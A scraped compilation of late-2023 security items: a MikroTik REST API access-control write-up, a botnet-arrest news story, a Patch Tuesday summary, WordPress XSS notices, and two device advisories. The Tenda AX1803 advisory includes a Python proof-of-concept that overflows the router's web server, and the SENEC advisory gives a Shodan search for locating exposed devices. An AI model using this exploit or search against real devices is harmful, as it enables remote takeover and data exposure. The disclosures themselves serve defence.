MikroTik RouterOS v7.1 to 7.11 was discovered to contain incorrect access control mechanisms in place for the Rest API.

Recently, Mikrotik added a REST server as a new API for managing the router. It is a nice alternative to their proprietary API when automating RouterOS.

However, young software usually contains bugs. Sometimes, these bugs are security-related, and, together with not-so-safe defaults, they may create a vulnerability.

This vulnerability has been assigned the ID CVE-2023-41570.

**Background**

RouterOS (from Mikrotik) is a closed-source Linux-based operating system for network appliances, specifically switches, routers and firewalls. It is used in Mikrotik appliances (such as RouterBOARD), but it can be downloaded and installed on other devices and virtual machines.

The management interfaces of RouterOS include SSH, MAC-Telnet, Winbox (a proprietary Windows-only tool), Webfig (a web user interface), and a proprietary API (additionally, ISPs have also TR-069). Since version v7.1beta4, RouterOS also includes a REST server. The REST server is started as a sub-resource of Webfig at /rest. More information on the RouterOS REST API web page.

**Authentication**

RouterOS supports local and remote user authentication and authorization databases (via RADIUS). Users belong to _groups_, each with its own permissions set. The resulting permission set is additive – it is the sum of all permissions granted by groups.

By default, only the local database is used, and three groups are present: full, with unlimited access to the router; write, with almost complete access except for file transfer (to/from the router itself) and user policies, and read, with read-only access (plus reboot privileges). Also, by default, rest-api is a specific permission granted to all groups.

Users may be restricted to logging in only from specific IP addresses or networks.

**The vulnerability**

REST APIs are protected by HTTP Basic authentication. You should provide a valid username and password pair. The username must have the rest-api (which, by default, is granted to all groups).

The vulnerability lies in the fact that, while other interfaces (SSH, Webfig, etc.) check whether the user is authorized to log in from that specific IP address, this is not the case for the REST server. **Users can access the REST server from any IP address**, even if they are not authorized in the users’ database.

To exploit this vulnerability:

*   the attacker must have a username and password pair that has rest-api permission (but no permission to log in from the attacker IP address);
*   the firewall should allow access to the web user interface from the IP address of the attacker;
*   Webfig (the web UI) must be enabled: the REST server is part of Webfig.

Note that, by default, all groups have the rest-api permission (any user is allowed to use REST APIs), and Webfig is enabled. There is no way to disable the REST server, as it is integrated into Webfig. This is unexpected; usually, services like SSH or proprietary APIs are under the “IP” -> “Services” menu with their independent entry. At the very least, there should be a flag in the Webfig service www to enable the REST server selectively (defaulting off).

So, I think the majority of those who left Webfig active don’t realize that they are exposing the REST endpoint too, and that every user can access it, regardless of the IP filter configured in the user database.

To exacerbate the problem, the read group has some dangerous permissions: sniff (to intercept traffic), reboot, and sensitive (read sensitive information, such as Wi-Fi passwords or IPSec pre-shared keys). I certainly do not expect a “read” user to reboot the router.

**Mikrotik advisory and solution**

Mikrotik released RouterOS version 7.12 with the fix (the changelog contains only a generic reference to “www - fixed allowed address setting for REST API users”).

**Timeline**

I followed the responsible disclosure process described in the “Responsible disclosure of discovered vulnerabilities” page. I reported the vulnerability at 2023-08-19 09:46:00 UTC and received the ACK at 2023-08-24 07:43:00 UTC. The fix was released in version 7.12 at 2023-11-09 09:45:00 UTC (time point from RouterOS changelog).

CVE-2023-41570: CVE-2023-41570: Access Control vulnerability in MikroTik REST API

By Waqas
The FBI arrested the operator of the IPStorm botnet, a Russian-Moldovan national, in Spain.
This is a post from HackRead.com Read the original post: Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US

The IPStorm botnet targeted Windows, Linux, Mac, and Android devices and claimed victims in Asia, Europe, North America, and South America.

A Russian-Moldovan national has pleaded guilty to operating an illegal botnet proxy service called IPStorm, responsible for infecting thousands of internet-connected devices worldwide.

Sergei Makinin, 32, of Moscow, Russia, was arrested by the F.B.I. with the cooperation of law enforcement authorities in Spain and Bitdefender, which provided cybersecurity consulting, resources, and guidance to track the suspect.

Makinin pleaded guilty to “three counts of violating 18 U.S.C. § 1030(a)(5)(A) Fraud and Related Activity in Connection with Computers,” in a district court in Puerto Rico as per the U.S. Department of Justice press release.

Makinin was suspected of running an extensive botnet-for-rent operation called Interplanetary Storm (IPStorm) used for illegal activities from June 2019 through December 2022. Bitdefender first documented the operation in a research paper in October 2020.

The botnet targeted Windows, Linux, Mac, and Android devices and claimed victims in Asia, Europe, North America, and South America. IPStorm anonymized its users’ internet traffic, allowing them to conduct malicious activities such as hacking, identity theft, and fraud.

Countries targeted by IPStorm botnet based on the number of victims (Credit: Bitdefender)

In his guilty plea, Makinin admitted that he and his accomplices ran IPStorm from 2015 to 2019 and successfully compromised over 40,000 devices using the IPStorm malware and 23,000 “highly anonymous” proxies. The domains used by Makinin is the scam were proxx.io and proxx.net.

The IPStorm malware allowed Makinin hijack the devices and use them as a proxy. Cybercriminals preferred the service because it was inexpensive, easy to use, and effectively anonymized their internet traffic. Makinin also admitted to developing/distributing malware for infecting the devices, earning $550,0000, and laundering the money.

Makinin is the first to be charged in connection with IPStorm. He faces up to 10 years in prison and will have to forfeit the cryptocurrency wallets linked with the scam. The sentencing is yet to be scheduled. Meanwhile, the F.B.I. and DoJ will continue to investigate the service.

Prices offered by Makinin (Screenshot credit: Hackread.com)

Commenting on this development is the operation’s lead researcher and Bitdefender’s Investigation and Forensics Unit’s senior director, Alexandru Catalin Cosoi. Cosoi shared with Hackread.com that IPStorm was a “complex” botnet rented by cybercriminals for various nefarious activities:

“The Interplanetary Storm botnet was complex and used to power various cybercriminal activities by renting it as a proxy as a service system over infected IoT devices. Our initial research back in 2020 uncovered valuable clues to the culprit behind its operation, and we are extremely pleased it helped lead to arrests,” Cosio explained.

“This investigation is another primary example of law enforcement and the private cybersecurity sector working together to shut down illegal online activities and bring those responsible to justice.”

Makinin’s conviction is a significant victory for law enforcement in the fight against cybercrime. Botnet proxy services remain a serious threat because they are used to committing cybercrimes. This development sends a strong message to other cybercriminals that they will be held accountable for their actions sooner or later.

****_RELATED ARTICLES_****

1.  **Russian Cybercriminal Pleads Guilty to Operating Kelihos Botnet**
2.  **Man whose DDoS attacks took down entire country’s Internet jailed**
3.  **Luminosity RAT author pleads guilty to creating, selling hacking tool**
4.  **2 Russians charged in Mt. Gox Bitcoin heist, BTC-e money laundering**
5.  **No Prison for Student who Developed Spam Botnet to Pay College Fee**

Operator of Major Proxy Botnet ‘IPStorm’ Arrested, Pleads Guilty in US

Microsoft today released updates to fix more than five dozen security holes in its Windows operating systems and related software, including three "zero day" vulnerabilities that Microsoft warns are already being exploited in active attacks.

**Microsoft** today released updates to fix more than five dozen security holes in its **Windows** operating systems and related software, including three “zero day” vulnerabilities that Microsoft warns are already being exploited in active attacks.

The zero-day threats targeting Microsoft this month include CVE-2023-36025, a weakness that allows malicious content to bypass the Windows SmartScreen Security feature. SmartScreen is a built-in Windows component that tries to detect and block malicious websites and files. Microsoft’s security advisory for this flaw says attackers could exploit it by getting a Windows user to click on a booby-trapped link to a shortcut file.

**Kevin Breen**, senior director of threat research at **Immersive Labs**, said emails with .url attachments or logs with processes spawning from .url files “should be a high priority for threat hunters given the active exploitation of this vulnerability in the wild.”

The second zero day this month is CVE-2023-36033, which is a vulnerability in the “DWM Core Library” in Microsoft Windows that was exploited in the wild as a zero day and publicly disclosed prior to patches being available. It affects Microsoft Windows 10 and later, as well as Microsoft Windows Server 2019 and subsequent versions.

“This vulnerability can be exploited locally, with low complexity and without needing high-level privileges or user interaction,” said **Mike Walters**, president and co-founder of the security firm **Action1**. “Attackers exploiting this flaw could gain SYSTEM privileges, making it an efficient method for escalating privileges, especially after initial access through methods like phishing.”

The final zero day in this month’s Patch Tuesday is a problem in the “Windows Cloud Files Mini Filter Driver” tracked as CVE-2023-36036 that affects Windows 10 and later, as well as Windows Server 2008 at later. Microsoft says it is relatively straightforward for attackers to exploit CVE-2023-36036 as a way to elevate their privileges on a compromised PC.

Beyond the zero day flaws, Breen said organizations running **Microsoft Exchange Server** should prioritize several new Exchange patches, including CVE-2023-36439, which is a bug that would allow attackers to install malicious software on an Exchange server. This weakness technically requires the attacker to be authenticated to the target’s local network, but Breen notes that a pair of phished Exchange credentials will provide that access nicely.

“This is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other vulnerable internal targets – just because your Exchange Server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said.

Breen said this vulnerability goes hand in hand with three other Exchange bugs that Microsoft designated as “exploitation more likely:” CVE-2023-36050, CVE-2023-36039 and CVE-2023-36035.

Finally, the **SANS Internet Storm Center** points to two additional bugs patched by Microsoft this month that aren’t yet showing signs of active exploitation but that were made public prior to today and thus deserve prioritization. Those include: CVE-2023-36038, a denial of service vulnerability in **ASP.NET Core**, with a CVSS score of 8.2; and CVE-2023-36413: A **Microsoft Office** security feature bypass. Exploiting this vulnerability will bypass the protected mode when opening a file received via the web.

Windows users, please consider backing up your data and/or imaging your system before applying any updates. And feel free to sound off in the comments if you experience any difficulties as a result of these patches.

Microsoft Patch Tuesday, November 2023 Edition

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Themeum WP Crowdfunding plugin <= 2.1.6 versions.

**Solution**

 Fixed

Update the WordPress WP Crowdfunding plugin to the latest available version (at least 2.1.7).

Found this useful? Thank Abu Hurayra for reporting this vulnerability. Buy a coffee ☕

Abu Hurayra discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Crowdfunding Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has been fixed in version 2.1.7.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47532: WordPress WP Crowdfunding plugin <= 2.1.6 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Sajjad Hossain Sagor WP Edit Username plugin <= 1.0.5 versions.

**Solution**

 No fix

No patched version is available.

Jeongwoo-Lee(Roronoa) discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress WP Edit Username Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47528: WordPress WP Edit Username plugin <= 1.0.5 - Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability (requires PHP 8.x) in CodeBard CodeBard's Patron Button and Widgets for Patreon plugin <= 2.1.9 versions.

**Solution**

 No fix

No patched version is available.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress CodeBard's Patron Button and Widgets for Patreon Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 1 present

 1 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47524: WordPress CodeBard's Patron Button and Widgets for Patreon plugin <= 2.1.9 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Photo Feed plugin <= 2.2.1 versions.

**Solution**

 No fix

No patched version is available.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Photo Feed Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47522: WordPress Photo Feed plugin <= 2.2.1 - Reflected Cross Site Scripting (XSS) vulnerability - Patchstack

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Michael Uno (miunosoft) Responsive Column Widgets plugin <= 1.2.7 versions.

**Solution**

 No fix

No patched version is available.

Le Ngoc Anh discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Responsive Column Widgets Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**Other vulnerabilities in this plugin**

 2 present

 0 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-47520: WordPress Responsive Column Widgets plugin <= 1.2.7 - Cross Site Scripting (XSS) vulnerability - Patchstack

Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName.

**stack buffer overflow in tdhttpd in Tenda AX1803 1.0.0.1\_2994 and earlier allows remote authenticated users to remote code excution via SetOnlineDevName request****Overview**

**type**: Buffer Overflow vulnerability

**Manufacturer** : Tenda( (https://www.tenda.com.cn/)

**Product**: WiFi router ax1803

**Firmware download address** ： https://www.tenda.com.cn/download/detail-3421.html

**Product Information**:Tendaax1803 router adopts WiFi 6 (802.11ax) technology, and the dual band concurrency rate is up to 1775mbps (2.4ghz:574mbps, 5ghz:1201mbps). Compared with the ac1200 router of the previous generation WiFi 5 standard, the wireless rate is increased by 50% and the transmission distance is longer; Equipped with 1.5GHz high-performance quad core processor, the network load capacity is comprehensively improved, data forwarding is faster, and long-term operation is more stable; Using ofdma+mu-mimo technology, more devices can access the Internet at the same time, the transmission efficiency is significantly improved, the delay is significantly reduced, and the online games and ultra clear videos for multiple people are more fluent. It is the first choice for building a multimedia home network!

Overview of the latest version router simulation of Tenda AX1803 v1.0.0.1\_2994  

**Vulnerablity details**

Download the firmware and decompress it, use Binwalk -e to extract filesystem  

The vulnerability lies in rootfs\_In /goform/SetOnlineDevName function of /bin/tdhttpd in ubif file system. attackers can access http://routerip/goform/SetOnlineDevName , and setting a very long DevName parameter to trigger stack buffer overlow, the stack buffer overflow can be caused to achieve the effect of router remote code excution and can obtain a stable root shell through a carefully constructed payload

Request can be found in this place:  

As we can see devName section in POST request.  

formSetDeviceName function (/bin/tdhttpd) call a function to bond device name with mac information, this function is vulnerable to buffer overflow.  
  
In the "set_name_with_mac" function, devName is copied into v9 array through sprintf function with format arg "%s;1", this means sprintf would copie all the content in devName and there is no length limitation for devName.  
The v9 array is defined in here. The length of array is 256 bytes, if the devName's length longer than v9 would cause buffer overflow

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    #!/usr/bin/env python3
    import requests,sys
    from pwn import *
    
    # replace ip address here
    url = "http://192.168.10.1/goform/SetOnlineDevName"
    payload = 'a' * 0x100
    
    payload = "mac=00:00:00:00:00:01&devName=%s&nodeName=mainNode"%payload
    content_length = len(payload)
    header = {
    "Host":"192.168.10.1",
    "X-Requested-With":"XMLHttpRequest",
    "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36",
    "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
    "Origin":"http://192.168.10.1",
    "Content-Length":"%d"%content_length,
    "Connection": "close",
    "Cookie": "password=bcf33de30ebf57e4d3785c08adec4b85cvztgb" # Note to replace the password field in the cookie
    }
    
    r = requests.post(url, headers=header, data=payload)
    
    

**result:**  
As you can see below, PC register is hijacked with payload. By constructing a payload, this can also get a stable root shell

CVE-2022-45781: Tenda AX1803 Buffer Overflow vulnerability . - XFALLEN

EnBw SENEC Legacy Storage Box versions 1 through 3 suffer from a log disclosure vulnerability.

Advisory ID: Ph0s-2023-001  
Product: EnBw - SENEC legacy storage box: V1-V3  
Manufacturer: SENEC - a part of EnBw  
Affected Version(s): Firmware: all (as of 2023-06-19)  
Tested Version(s): current  
Vulnerability Type: CWE-284: Improper Access Control

Risk Level:  
CVSS v3.1 Vector:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N1 (7.5 High)

Manufacturer Risk Level Rating:  
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:T/RC:C  
Overall CVSS Score: 7.2

Solution Status: Fixed  
Manufacturer Notification: 2023-06-05  
Public Disclosure: 2023-11-01  
CVE Reference: CVE-2023-39167  
Author of Advisory: Ph0s[4], R0ckE7

********************************************************************************

Overview:  
Foreword:  
This vulnerability was reported to the enbw-cert. we would like to  
thank enbw-cert for taking care of the vulns and patch the systems.  
we decided to publish when most of the reported vulns are patched  
to make sure nobody is harmed when 3rdparys exploit the mentioned vulns.

About Senec:  
We are SENEC

We have been the EnBW energy independence experts since 2018 – but we have  
put our heart and soul into guiding customers on the route to independence  
since SENEC was founded in 2009. Our passion lies in actively promoting the  
energy transition with innovative ideas and pioneering products. And,  
because we don’t do things by halves, our unwavering ambition is to create  
integrated solutions that enable you to enjoy the highest possible degree  
of independence and sustainability through self-generation of solar  
electricity.

About SENEC Home:

SENEC.Home: The smart electricity storage device for your home

SENEC.Home is the heart of the your sustainable, affordable supply of solar  
electricity. The smart battery storage device stores excess electricity  
generated by your PV system so that you can use it when you need it – such as  
when your household’s energy consumption rises in the evening, or on rainy days  
when your PV system generates less power.

********************************************************************************

Vulnerability Details:

No authentication is required to access log information. The URL required for  
this corresponds to the scheme http://SENEC-IP/log/YYYY/MM/DD.log , e.g.:

http://178.202.XX.XXX/log/2023/05/14.log

These contain sensitive information about the operating status of the  
photovoltaic system, software releases and usernames used for login.  
An unauthenticated attacker is able to use this information, among other things,  
to:

• Draw conclusions about the effectiveness of various types of attacks, e.g. by  
evaluating changes in the logged operating status.

• Target known vulnerabilities related to the software release of the  
application itself and any used third-party libraries.

• Use it as a stepping stone for deeper attacks, e.g. to prepare brute force  
attacks involving the usernames provided in the log.

********************************************************************************

Proof of Concept (PoC):

The attack consists of the following steps:

1. grab an ip of an affected System, eg via Shodan Dork:  
https://www.shodan.io/search?query=http.html%3A<title>SENEC<%2Ftitle>

2. exploit by reading the log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:  
Patched by Manufacturer  
(Rolled out until September 11, 2023)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2022-06-01: Vulnerability discovered  
2023-06-05: Vulnerability reported to manufacturer  
2023-09-11: Patch rollout by manufacturer to affected devices  
2023-11-01: Public disclosure of vulnerability

************************************************************************

Researcher:  
Ph0s[4], R0ckE7

************************************************************************

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0  
URL: https://creativecommons.org/licenses/by/4.0/deed.en

Tag

#auth